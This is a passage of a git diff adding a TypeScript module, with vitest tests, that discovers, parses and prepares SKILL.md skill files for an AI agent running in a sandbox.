"recoup-api", + description: "Recoupable API skill", + path: "/home/vercel-sandbox/.agents/skills/recoup-api", + filename: "SKILL.md", + options: {}, +}; + +describe("getSkills", () => { + it("returns the skills array when present in a valid AgentContext", () => { + expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]); + }); + + it("returns [] when no skills field is set", () => { + expect(getSkills(validCtx)).toEqual([]); + }); + + it("returns [] for malformed contexts (non-AgentContext shape)", () => { + expect(getSkills(undefined)).toEqual([]); + expect(getSkills(null)).toEqual([]); + expect(getSkills({ noSandbox: true })).toEqual([]); + expect(getSkills({ sandbox: null })).toEqual([]); + }); +}); diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts new file mode 100644 index 000000000..ac6d646bb --- /dev/null +++ b/lib/skills/__tests__/injectSkillDirectory.test.ts @@ -0,0 +1,14 @@ +import { describe, it, expect } from "vitest"; +import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory"; + +describe("injectSkillDirectory", () => { + it("prepends a `Skill directory: ` header followed by a blank line", () => { + expect(injectSkillDirectory("body content", "/skills/foo")).toBe( + "Skill directory: /skills/foo\n\nbody content", + ); + }); + + it("works with empty body", () => { + expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n"); + }); +}); diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts new file mode 100644 index 000000000..91dfcf7c1 --- /dev/null +++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from "vitest"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; + +describe("parseSkillFrontmatter", () => { + it("parses a minimal frontmatter (name + description)", () => { + const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.name).toBe("commit"); + expect(result.data.description).toBe("Make a git commit"); + }); + + it("unwraps double-quoted values (including escaped quotes)", () => { + const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe('Has "quotes" inside'); + }); + + it("parses booleans for unquoted true/false", () => { + const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data["disable-model-invocation"]).toBe(true); + expect(result.data["user-invocable"]).toBe(false); + }); + + it("treats `true`/`false` inside quotes as strings (not booleans)", () => { + const md = `---\nname: foo\ndescription: "true"\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("true"); + }); + + it("returns success:false when frontmatter is missing", () => { + const result = parseSkillFrontmatter("just markdown, no frontmatter"); + expect(result.success).toBe(false); + }); + + it("returns success:false when required fields are absent", () => { + const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`); + expect(result.success).toBe(false); + }); + + it("preserves colons in values (e.g. URLs)", () => { + const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`; + const result = parseSkillFrontmatter(md); + expect(result.success).toBe(true); + if (!result.success) return; + expect(result.data.description).toBe("see https://example.com"); + }); +}); diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts new file mode 100644 index 000000000..db4fb0aa9 --- /dev/null +++ b/lib/skills/__tests__/substituteArguments.test.ts @@ -0,0 +1,22 @@ +import { describe, it, expect } from "vitest"; +import { substituteArguments } from "@/lib/skills/substituteArguments"; + +describe("substituteArguments", () => { + it("replaces $ARGUMENTS with the provided args", () => { + expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe( + "run with --flag value", + ); + }); + + it("replaces all occurrences", () => { + expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x"); + }); + + it("substitutes empty string when args are undefined", () => { + expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with "); + }); + + it("leaves text unchanged when $ARGUMENTS is absent", () => { + expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here"); + }); +}); diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts new file mode 100644 index 000000000..9ae0ced67 --- /dev/null +++ b/lib/skills/discoverSkills.ts @@ -0,0 +1,89 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; +import { findSkillFile } from "@/lib/skills/findSkillFile"; +import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter"; +import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Built-in commands that skills cannot shadow. Skills with these names + * would be unreachable via slash command, so we drop them at discovery. + */ +const BUILTIN_COMMANDS = ["model", "resume", "new"]; + +/** + * Scan a list of directories for skills. Each directory is expected to + * contain one subdirectory per skill, with a SKILL.md (or skill.md) + * inside. Returns metadata for everything discoverable; silently skips + * non-directories, missing files, malformed frontmatter, and names that + * shadow built-in slash commands. + * + * Dedupes by name (case-insensitive); first-wins across directories so + * callers can list project skills before global skills and have project + * shadow global. + * + * @param sandbox - Connected sandbox for file ops. + * @param directories - Absolute paths to scan. + */ +export async function discoverSkills( + sandbox: Sandbox, + directories: string[], +): Promise { + const skills: SkillMetadata[] = []; + const seen = new Set(); + + for (const dir of directories) { + try { + const stat = await sandbox.stat(dir); + if (!stat.isDirectory()) continue; + } catch { + continue; // directory doesn't exist + } + + let entries; + try { + entries = await sandbox.readdir(dir, { withFileTypes: true }); + } catch { + continue; + } + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + + const skillDir = path.join(dir, entry.name); + const skillFile = await findSkillFile(sandbox, skillDir); + if (!skillFile) continue; + + let content: string; + try { + content = await sandbox.readFile(skillFile, "utf-8"); + } catch { + continue; + } + + const parsed = parseSkillFrontmatter(content); + if (!parsed.success) continue; + const frontmatter = parsed.data; + + if (BUILTIN_COMMANDS.includes(frontmatter.name.toLowerCase())) { + console.warn( + `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`, + ); + continue; + } + + const normalized = frontmatter.name.toLowerCase(); + if (seen.has(normalized)) continue; + seen.add(normalized); + + skills.push({ + name: frontmatter.name, + description: frontmatter.description, + path: skillDir, + filename: path.basename(skillFile), + options: frontmatterToOptions(frontmatter), + }); + } + } + + return skills; +} diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts new file mode 100644 index 000000000..d1dcb3f5e --- /dev/null +++ b/lib/skills/extractSkillBody.ts @@ -0,0 +1,14 @@ +/** + * Strip the YAML frontmatter from a SKILL.md file and return just the + * markdown body. Returns the entire content (trimmed) when no + * frontmatter is present. + * + * @param fileContent - Full file content read from sandbox. + */ +export function extractSkillBody(fileContent: string): string { + const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/); + if (match) { + return fileContent.slice(match[0].length).trim(); + } + return fileContent.trim(); +} diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts new file mode 100644 index 000000000..a81b9e415 --- /dev/null +++ b/lib/skills/findSkillFile.ts @@ -0,0 +1,33 @@ +import * as path from "path"; +import type { Sandbox } from "@/lib/sandbox/interface"; + +/** + * Locate the SKILL.md file inside a candidate skill directory. Prefers + * uppercase `SKILL.md` (the project convention) but falls back to + * lowercase `skill.md` for skills that ship the lowercase name. Returns + * `null` when neither file exists so callers can skip the entry. + * + * Probes via `sandbox.access` (which throws on missing) rather than + * `readdir` so we don't pay the cost of listing a directory whose + * contents we don't otherwise need. + * + * @param sandbox - Connected sandbox handle. + * @param skillDir - Absolute path to the candidate skill directory. + */ +export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise { + const uppercase = path.join(skillDir, "SKILL.md"); + const lowercase = path.join(skillDir, "skill.md"); + + try { + await sandbox.access(uppercase); + return uppercase; + } catch { + // try lowercase + } + try { + await sandbox.access(lowercase); + return lowercase; + } catch { + return null; + } +} diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts new file mode 100644 index 000000000..788a6dfc7 --- /dev/null +++ b/lib/skills/getGlobalSkillsDirectory.ts @@ -0,0 +1,14 @@ +import * as path from "path"; + +/** + * Resolve the absolute path to the global skills directory under a + * given `$HOME`. This is where `installSessionGlobalSkills` lays down + * skills at sandbox provisioning time via `npx skills add ... -g` + * (today: `recoup-api`, `artist-workspace`). + * + * @param homeDirectory - The sandbox's resolved $HOME (e.g. + * `/home/vercel-sandbox`, or `/root` on the open-agents base image). + */ +export function getGlobalSkillsDirectory(homeDirectory: string): string { + return path.posix.join(homeDirectory, ".agents", "skills"); +} diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts new file mode 100644 index 000000000..81645ea46 --- /dev/null +++ b/lib/skills/getSandboxSkillDirectories.ts @@ -0,0 +1,16 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory"; +import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory"; + +/** + * Resolve the directory list to scan when discovering skills for a + * sandbox. Currently just one path — `${HOME}/.agents/skills/` — + * because all skills are provisioned globally at sandbox startup via + * `installSessionGlobalSkills` rather than bundled into the cloned repo. + * + * @param sandbox - Connected sandbox handle. + */ +export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise { + const homeDirectory = await resolveSandboxHomeDirectory(sandbox); + return [getGlobalSkillsDirectory(homeDirectory)]; +} diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts new file mode 100644 index 000000000..d2d29ed7d --- /dev/null +++ b/lib/skills/getSkills.ts @@ -0,0 +1,22 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; +import type { SkillMetadata } from "@/lib/skills/skillTypes"; + +/** + * Read the discovered skill catalog out of the agent's + * `experimental_context`. The catalog is populated by the chat handler + * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))` + * before workflow start, then threaded through as + * `AgentContext.skills`. Returns `[]` when the context shape is wrong + * or no skills were discovered. + * + * Lives in its own file so consumers (the `skill` tool today, future + * skill-aware system prompts tomorrow) share one accessor instead of + * each reimplementing the context-cast. + * + * @param experimental_context - Opaque context object passed by AI SDK to tool execute. + */ +export function getSkills(experimental_context: unknown): SkillMetadata[] { + if (!isAgentContext(experimental_context)) return []; + const ctx = experimental_context as { skills?: SkillMetadata[] }; + return ctx.skills ?? []; +} diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts new file mode 100644 index 000000000..cf4bf58d5 --- /dev/null +++ b/lib/skills/injectSkillDirectory.ts @@ -0,0 +1,11 @@ +/** + * Prepend a `Skill directory: ` header to a skill body + * so the model can construct full paths to scripts and resources living + * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`). + * + * @param body - Skill body (after frontmatter strip). + * @param skillDir - Absolute sandbox path to the skill directory. + */ +export function injectSkillDirectory(body: string, skillDir: string): string { + return `Skill directory: ${skillDir}\n\n${body}`; +} diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts new file mode 100644 index 000000000..3d2888d76 --- /dev/null +++ b/lib/skills/parseSkillFrontmatter.ts @@ -0,0 +1,52 @@ +import { skillFrontmatterSchema } from "@/lib/skills/skillTypes"; + +/** + * Parse YAML frontmatter from SKILL.md content. Returns the Zod + * `safeParse` shape so callers can branch cleanly on success. + * + * Intentionally a hand-rolled subset of YAML (one-line `key: value` + * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't + * pull a YAML dep just to read a 3-line block. + * + * @param content - Full SKILL.md content (including the leading `---`). + */ +export function parseSkillFrontmatter( + content: string, +): ReturnType { + const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/); + if (!match?.[1]) { + return { + success: false, + error: new Error("No frontmatter found") as never, + }; + } + + const yaml = match[1]; + const parsed: Record = {}; + + for (const line of yaml.split("\n")) { + const trimmed = line.trim(); + if (!trimmed || trimmed.startsWith("#")) continue; + + const colonIndex = trimmed.indexOf(":"); + if (colonIndex === -1) continue; + + const key = trimmed.slice(0, colonIndex).trim(); + // Only split on the first colon so values like URLs stay intact. + let value: string | boolean = trimmed.slice(colonIndex + 1).trim(); + + if (value.startsWith('"') && value.endsWith('"')) { + value = value.slice(1, -1).replace(/\\"/g, '"'); + } else if (value.startsWith("'") && value.endsWith("'")) { + value = value.slice(1, -1).replace(/\\'/g, "'"); + } else if (value === "true") { + value = true; + } else if (value === "false") { + value = false; + } + + parsed[key] = value; + } + + return skillFrontmatterSchema.safeParse(parsed); +} diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts new file mode 100644 index 000000000..77fffd055 --- /dev/null +++ b/lib/skills/skillTypes.ts @@ -0,0 +1,76 @@ +import { z } from "zod"; + +/** + * Zod schema for skill frontmatter YAML validation. Defines the + * expected structure at the top of SKILL.md files. + */ +export const skillFrontmatterSchema = z.object({ + name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"), + description: z + .string() + .min(1, "Skill description cannot be empty") + .describe("Short description for the agent"), + version: z.string().optional().describe("Skill version"), + "disable-model-invocation": z + .boolean() + .optional() + .describe("If true, the model cannot invoke this skill automatically"), + "user-invocable": z + .boolean() + .optional() + .describe("If false, users cannot invoke this skill via slash command"), + "allowed-tools": z + .string() + .optional() + .describe("Comma-separated list of allowed tools when skill is active"), + context: z.enum(["fork"]).optional().describe("Execution context for the skill"), + agent: z.string().optional().describe("Agent type to use for execution"), +}); + +export type SkillFrontmatter = z.infer; + +/** + * Normalized skill options derived from frontmatter — camelCase fields, + * comma-separated lists pre-split. + */ +export interface SkillOptions { + disableModelInvocation?: boolean; + userInvocable?: boolean; + allowedTools?: string[]; + context?: "fork"; + agent?: string; +} + +/** + * Skill metadata stored on `AgentContext.skills`. Contains only what + * `skillTool` needs at invocation time — the SKILL.md body is loaded + * lazily. + */ +export interface SkillMetadata { + /** Unique name of the skill. */ + name: string; + /** Short description for the agent. */ + description: string; + /** Absolute sandbox path to the skill directory. */ + path: string; + /** Filename of the skill file (`SKILL.md` or `skill.md`). */ + filename: string; + /** Skill options from frontmatter. */ + options: SkillOptions; +} + +/** + * Normalize parsed frontmatter to {@link SkillOptions}. + */ +export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions { + return { + disableModelInvocation: frontmatter["disable-model-invocation"], + userInvocable: frontmatter["user-invocable"], + allowedTools: frontmatter["allowed-tools"] + ?.split(",") + .map(t => t.trim()) + .filter(Boolean), + context: frontmatter.context, + agent: frontmatter.agent, + }; +} diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts new file mode 100644 index 000000000..44500bc58 --- /dev/null +++ b/lib/skills/substituteArguments.ts @@ -0,0 +1,14 @@ +/** + * Replace all occurrences of `$ARGUMENTS` in a skill body with the + * provided args string (or empty string when no args were passed). + * + * Used by `skillTool` after loading SKILL.md so slash-command-style + * invocations like `/commit -m "fix"` thread the arg suffix through to + * the skill's body text. + * + * @param body - Skill body (markdown after frontmatter). + * @param args - Optional arguments passed by the model. + */ +export function substituteArguments(body: string, args?: string): string { + return body.replace(/\$ARGUMENTS/g, args ?? ""); +}